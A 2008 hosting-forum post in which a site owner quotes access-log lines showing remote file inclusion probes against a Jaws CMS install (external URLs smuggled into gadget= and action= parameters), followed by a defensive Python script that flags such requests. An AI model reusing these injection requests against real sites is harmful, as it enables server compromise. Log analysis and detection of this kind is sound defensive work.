Web Hosting Forum | Lunarpages

Author Topic: Hack attempt or exploit?  (Read 3423 times)

cgrobin
Hack attempt or exploit?
« on: February 25, 2008, 03:59:14 PM »
I was reviewing my logs last night, and I'm finding all kinds of bizarre entries I've never seen before.  I tried to Google parts of the entry and found references to a Joomla exploit.   

Here is a sample entry from my log:
Quote
ezechiel.sdb.cz!03/Feb!20:11:59!!200 609!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:00!leftnav.htm!200 2179!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:01!home.html!200 1826!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:02!Tagged.shtml!200 964!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:03!jaws!301 304!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:04!jaws/!200 3120!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:05!jaws/?gadget=http%3A%2F%2Fwww.feliciano.de%2FWebgalerie%2Fbilder%2FItaly%2Fune%2Fyiwul%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:06!jaws/?gadget=http%3A%2F%2Fhonamfishing.co.kr%2Fphpmysqladmin%2Flibraries%2Foduzov%2Fneloze%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:07!jaws/?gadget=http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Faseje%2Fwocobo%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:08!jaws/?gadget=Blog&action=http%3A%2F%2Fwww.electrofed.com%2F_app%2Fefc%2Fodoqu%2Fferus%2F!200 2742!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:09!jaws/?gadget=Blog&action=http%3A%2F%2Fwww.ce-cioceoforum.com%2Ftalk%2Ft1%2Froda%2Filubov%2F!200 2742!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:10!jaws/?gadget=Blog&action=http%3A%2F%2Fwww.obrasmecanicasch.com%2Fomch%2Fimg%2Fitofu%2Fviroja%2F!200 2742!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:11!jaws/?gadget=Phoo!200 4480!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:13!jaws/index.php/photos/album/1.html!200 5645!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:14!jaws/index.php/photos/album/index.php?http%3A%2F%2Fwww.unduetretoccaate.it%2Fcodice%2Faseje%2Fwocobo%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:15!jaws/index.php/photos/album/index.php?http%3A%2F%2Fwww.marsbook.co.kr%2Fmain%2Fcreated%2Fproduct%2F2%2Fupu%2Fohoqoh%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:16!jaws/index.php/photos/album/index.php?http%3A%2F%2Fwww.psikolojikyardim.org%2Fetkinlik%2Finclude%2Feto%2Fnixaz%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:20!jaws/index.php/photos/album/?gadget=Phoo!200 4451!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:22!jaws/index.php/photos/album/index.php?photos/album/2.html!200 4250!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)
ezechiel.sdb.cz!03/Feb!20:12:24!jaws/index.php/photos/album/index.php?photos/album/2/photo/11.html!200 3055!Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322)

Here are more entries from my February log, copied into a Word doc.   http://cgrobin.com/HackFeb.doc

I have Jaws running on my site, and it seems to be trying to use it to hit another server. I don't see anything off on my account, but I don't want someone else to think I'm the one attacking their server.

Is anyone else getting this, and is there anything that can be done?   I have a small board in a subdomain and members have been commenting the site has been slow and I wonder now if the server is getting a lot of these requests.

Thanks
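
The entries quoted above share one pattern: a URL-encoded external address passed as a gadget= or action= value, or as a bare query string, which is typical of remote file inclusion probing. The sketch below is an added example, not part of the original post, that picks such requests out of this log format and groups them by client; the field layout (host!date!time!path!status size!user-agent) is inferred from the quoted lines and the hosts in the sample are constructed placeholders.

```python
import re
from urllib.parse import unquote

# Constructed sample in the '!'-delimited layout seen in the post; hosts are placeholders.
SAMPLE_LOG = """\
scanner.example!03/Feb!20:12:04!jaws/!200 3120!Mozilla/4.0 (compatible; MSIE 7.0)
scanner.example!03/Feb!20:12:05!jaws/?gadget=http%3A%2F%2Fremote.example%2Fa%2Fb%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0)
scanner.example!03/Feb!20:12:08!jaws/?gadget=Blog&action=http%3A%2F%2Fremote.example%2Fc%2F!200 2742!Mozilla/4.0 (compatible; MSIE 7.0)
scanner.example!03/Feb!20:12:14!jaws/index.php/photos/album/index.php?http%3A%2F%2Fremote.example%2Fd%2F!200 73!Mozilla/4.0 (compatible; MSIE 7.0)
visitor.example!03/Feb!20:12:22!jaws/index.php/photos/album/index.php?photos/album/2.html!200 4250!Mozilla/4.0 (compatible; MSIE 7.0)
"""

URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def parse_line(line):
    """Split one log line into a dict, or return None if it is malformed."""
    head = line.split("!", 3)            # host, date, time, remainder
    if len(head) != 4:
        return None
    tail = head[3].rsplit("!", 2)        # path, "status size", user-agent
    if len(tail) != 3:                   # assumes no '!' inside the user-agent
        return None
    status, _, size = tail[1].partition(" ")
    return {"host": head[0], "date": head[1], "time": head[2],
            "path": tail[0], "status": status, "size": size, "agent": tail[2]}

def url_params(path):
    """Return (name, decoded value) for query parts that decode to a URL."""
    _, _, query = path.partition("?")
    hits = []
    for part in query.split("&"):
        name, sep, value = part.partition("=")
        if not sep:                      # bare value: index.php?http%3A%2F%2F...
            name, value = "", part
        decoded = unquote(value)
        if URL_RE.match(decoded):
            hits.append((name, decoded))
    return hits

def find_probes(log_text):
    """Map client host -> list of (time, param, url, status, size)."""
    report = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, url in url_params(rec["path"]):
            report.setdefault(rec["host"], []).append(
                (rec["time"], name, url, rec["status"], rec["size"]))
    return report

if __name__ == "__main__":
    for host, hits in find_probes(SAMPLE_LOG).items():
        print(host, len(hits), "suspicious requests", hits)
```

The status and size are kept in each hit because a response whose size differs from the application's usual error page is the first thing to check when deciding whether a request was merely attempted or actually processed.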
